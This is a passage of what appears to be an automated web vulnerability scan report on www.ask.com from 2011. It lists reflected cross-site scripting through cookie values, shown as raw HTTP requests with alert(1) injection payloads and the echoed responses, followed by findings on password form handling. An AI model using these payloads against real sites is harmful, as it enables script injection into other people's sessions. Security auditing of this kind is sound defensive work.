Cookie: cu.wz=0; wz_cu=0284b6"-alert(1)-"2961042f29c; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F3; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3; __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.2.10.1300982764; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjAwLVVUQw%3D%3D&po=0&pp=dir

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 24 Mar 2011 16:07:18 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjE4LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:07:18 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:07:18 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 59473


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>


<tit
...[SNIP]...

st.height = 1;
st.width = 1;
st.id = "SessionTracker";
st.src = "http://wzus1.ask.com/i/i.gif?t=v&d=us&s=a&c=ph&l=dir&o=0&ld=5489&sv=0a5c4070&p=pictureslanding&rf=0&ord=4433187&wz_cu=0284b6"-alert(1)-"2961042f29c";


</script>
...[SNIP]...
1.26. http://www.ask.com/pictureslanding [wz_cu cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /pictureslanding

Issue detail

The value of the wz_cu cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6fc8"><script>alert(1)</script>dbb23d0e710 was submitted in the wz_cu cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /pictureslanding?o=0&l=dir HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/?o=0&l=dir
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cu.wz=0; wz_cu=0b6fc8"><script>alert(1)</script>dbb23d0e710; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F3; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3; __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.2.10.1300982764; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjAwLVVUQw%3D%3D&po=0&pp=dir

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Thu, 24 Mar 2011 16:07:17 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjE3LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:07:17 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:07:17 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 59655


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>


<tit
...[SNIP]...
<img src="http://wzus1.ask.com/i/i.gif?t=v&d=us&s=a&c=ph&l=dir&o=0&ld=5489&sv=0a5c4073&p=pictureslanding&rf=0&ord=4356532&wz_cu=0b6fc8"><script>alert(1)</script>dbb23d0e710" height=1 width=1 id="SessionTracker" />
...[SNIP]...
1.27. http://www.ask.com/pictureslanding [wz_sid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /pictureslanding

Issue detail

The value of the wz_sid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a0e83'-alert(1)-'992fae9488d was submitted in the wz_sid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /pictureslanding?o=0&l=dir HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/?o=0&l=dir
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F3; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3a0e83'-alert(1)-'992fae9488d; __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.2.10.1300982764; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjAwLVVUQw%3D%3D&po=0&pp=dir

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Thu, 24 Mar 2011 16:07:25 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjI1LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:07:25 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:07:25 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 59165


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>


<tit
...[SNIP]...
<iframe id="mar" src="http://fls.doubleclick.net/activityi;src=2903398;type=spons876;cat=ask_s775;u1=0845DB8DB66BB2CFE0A8DECE14D761F3;u4=0144DB8DB86BB2CFE0A8DECE14D761F3a0e83'-alert(1)-'992fae9488d;u3=0;u2=;ord=-1164671048?" width="1" height="1" frameborder="0">
...[SNIP]...
1.28. http://www.ask.com/pictureslanding [wz_uid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /pictureslanding

Issue detail

The value of the wz_uid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4d366'-alert(1)-'85dbf415022 was submitted in the wz_uid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /pictureslanding?o=0&l=dir HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/?o=0&l=dir
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F34d366'-alert(1)-'85dbf415022; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3; __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.2.10.1300982764; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjAwLVVUQw%3D%3D&po=0&pp=dir

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Thu, 24 Mar 2011 16:07:23 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjIzLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:07:23 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:07:23 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 61892


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>


<tit
...[SNIP]...
<iframe id="mar" src="http://fls.doubleclick.net/activityi;src=2903398;type=spons876;cat=ask_s775;u1=0845DB8DB66BB2CFE0A8DECE14D761F34d366'-alert(1)-'85dbf415022;u4=0144DB8DB86BB2CFE0A8DECE14D761F3;u3=0;u2=;ord=-808111521?" width="1" height="1" frameborder="0">
...[SNIP]...
2. Cleartext submission of password  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ask.com
Path:   /ja-ask-dialog

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /ja-ask-dialog?type=signin HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/?o=0&l=dir
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA1OjI4LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: no-cache
Content-Type: text/html;charset=UTF-8
Date: Thu, 24 Mar 2011 16:05:29 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA1OjI5LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:05:29 GMT; Path=/
Content-Length: 68842



...[SNIP]...
</div>


<form name="signupform" id="signupform" style="display:block" action="http://www.ask.com/ja-check-user" method="POST">
<fieldset>
...[SNIP]...
<div class="signup_col2">
                           <input style="width:262px;margin-right:10px" type="password" onchange="JASK.ask_dialog.validatePassword();" id="dialog_password" name="password" tabindex="0" class="txtin txt3 abstract">
                       </div>
...[SNIP]...
<div class="signup_col2">
                           <input style="width:262px;margin-right:10px" type="password" onchange="JASK.ask_dialog.confirmPassword();" id="dialog_password2" name="password2" tabindex="0" class="txtin txt3 abstract">
                       </div>
...[SNIP]...
3. Password field submitted using GET method  previous  next
There are 2 instances of this issue:

3.1. http://www.ask.com/ja-ask-dialog  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ask.com
Path:   /ja-ask-dialog

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request

GET /ja-ask-dialog?type=signin HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/?o=0&l=dir
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA1OjI4LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: no-cache
Content-Type: text/html;charset=UTF-8
Date: Thu, 24 Mar 2011 16:05:29 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA1OjI5LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:05:29 GMT; Path=/
Content-Length: 68842



...[SNIP]...
<div style="float:left;">
<form name="signinform" id="signinform" action="https://secure.ask.com/ja-authenticate" method="GET">
<input type="hidden" name="engine_id" value="sign_in">
...[SNIP]...
</div>
<input tabindex="0" style="width:240px;" type="password" id="signin_password" name="password" class="txtin">
</div>
...[SNIP]...
3.2. http://www.ask.com/ja-ask-dialog  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ask.com
Path:   /ja-ask-dialog

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request

GET /ja-ask-dialog?type=signin HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/?o=0&l=dir
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA1OjI4LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: no-cache
Content-Type: text/html;charset=UTF-8
Date: Thu, 24 Mar 2011 16:05:29 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA1OjI5LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:05:29 GMT; Path=/
Content-Length: 68842



...[SNIP]...
</div>

<form name="linkacctform" id="linkacctform" action="https://secure.ask.com/ja-authenticate" method="GET">
<input type="hidden" name="engine_id" value="sign_in">
...[SNIP]...
</div>
            <input tabindex="0" style="width:240px;" type="password" id="linkacct_password" name="password" class="txtin">
<div style="margin-top:10px" class="askq_show">
...[SNIP]...
4. Password field with autocomplete enabled  previous  next
There are 3 instances of this issue:

4.1. http://www.ask.com/ja-ask-dialog  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ask.com
Path:   /ja-ask-dialog

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /ja-ask-dialog?type=signin HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/?o=0&l=dir
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA1OjI4LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: no-cache
Content-Type: text/html;charset=UTF-8
Date: Thu, 24 Mar 2011 16:05:29 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA1OjI5LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:05:29 GMT; Path=/
Content-Length: 68842



...[SNIP]...
</div>

<form name="linkacctform" id="linkacctform" action="https://secure.ask.com/ja-authenticate" method="GET">
<input type="hidden" name="engine_id" value="sign_in">
...[SNIP]...
</div>
            <input tabindex="0" style="width:240px;" type="password" id="linkacct_password" name="password" class="txtin">
<div style="margin-top:10px" class="askq_show">
...[SNIP]...
4.2. http://www.ask.com/ja-ask-dialog  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ask.com
Path:   /ja-ask-dialog

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /ja-ask-dialog?type=signin HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/?o=0&l=dir
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA1OjI4LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: no-cache
Content-Type: text/html;charset=UTF-8
Date: Thu, 24 Mar 2011 16:05:29 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA1OjI5LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:05:29 GMT; Path=/
Content-Length: 68842



...[SNIP]...
</div>


<form name="signupform" id="signupform" style="display:block" action="http://www.ask.com/ja-check-user" method="POST">
<fieldset>
...[SNIP]...
<div class="signup_col2">
                           <input style="width:262px;margin-right:10px" type="password" onchange="JASK.ask_dialog.validatePassword();" id="dialog_password" name="password" tabindex="0" class="txtin txt3 abstract">
                       </div>
...[SNIP]...
<div class="signup_col2">
                           <input style="width:262px;margin-right:10px" type="password" onchange="JASK.ask_dialog.confirmPassword();" id="dialog_password2" name="password2" tabindex="0" class="txtin txt3 abstract">
                       </div>
...[SNIP]...
4.3. http://www.ask.com/ja-ask-dialog  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ask.com
Path:   /ja-ask-dialog

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /ja-ask-dialog?type=signin HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/?o=0&l=dir
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA1OjI4LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: no-cache
Content-Type: text/html;charset=UTF-8
Date: Thu, 24 Mar 2011 16:05:29 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA1OjI5LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:05:29 GMT; Path=/
Content-Length: 68842



...[SNIP]...
<div style="float:left;">
<form name="signinform" id="signinform" action="https://secure.ask.com/ja-authenticate" method="GET">
<input type="hidden" name="engine_id" value="sign_in">
...[SNIP]...
</div>
<input tabindex="0" style="width:240px;" type="password" id="signin_password" name="password" class="txtin">
</div>
...[SNIP]...
5. Referer-dependent response  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ask.com
Path:   /answers/7153311/is-nail-polish-bad-for-your-nails

Request 1

GET /answers/7153311/is-nail-polish-bad-for-your-nails?qsrc=4034 HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/?o=0&l=dir
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F3; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.3.10.1300982764; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjUxLVVUQw%3D%3D&po=0&pp=dir; wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3

Response 1

HTTP/1.1 200 OK
Server: Apache
Cache-Control: no-cache
Content-Type: text/html;charset=UTF-8
Date: Thu, 24 Mar 2011 16:09:53 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA5OjUyLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:09:52 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:09:52 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 118233


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">


<html>


<head>
   


...[SNIP]...
text/javascript">
var st = new Image();
st.height = 1;
st.width = 1;
st.id = "SessionTracker";
st.src = "http://wzus1.ask.com/i/i.gif?t=v&d=us&s=a&c=qna&l=dir&o=0&ld=5489&sv=0a5c407b&p=ja-question&rf=0&ord=7813837&wz_cu=0";



</script>
<noscript><img src="http://wzus1.ask.com/i/i.gif?t=v&d=us&s=a&c=qna&l=dir&o=0&ld=5489&sv=0a5c407b&p=ja-question&rf=0&ord=7813837&wz_cu=0" height=1 width=1 id="SessionTracker" /></noscript>
</span>











<div id="ask_question_dialog"></div>
<div id="ask_question_dialog_container" style="display:none"></div>
<div id="asDlgWrap" style="overflow:hidden"></div>




































<div id="serp_ftr" class="ask-mrl15" style="margin-bottom:4px;margin-top:4px" >

















































































<a href="/about" onmousedown="return ct(this,30771)" class="txt2 info l_nu" target="_top">
About</a>


<span class="txt2 info" style="padding:0 5px 0 5px;">&#45;</span>

















































<a href="/about/legal/privacy" onmousedown="return ct(this,30771)" class="txt2 info l_nu" target="_top">
Privacy</a>


<span class="txt2 info" style="padding:0 5px 0 5px;">&#45;</span>

























<a href="http://www.ask.com/settings#askeraser" class="txt2 info l_nu" onClick="">AskEraser</a>






<span class="txt2 info" style="padding:0 5px 0 5p
...[SNIP]...

Request 2

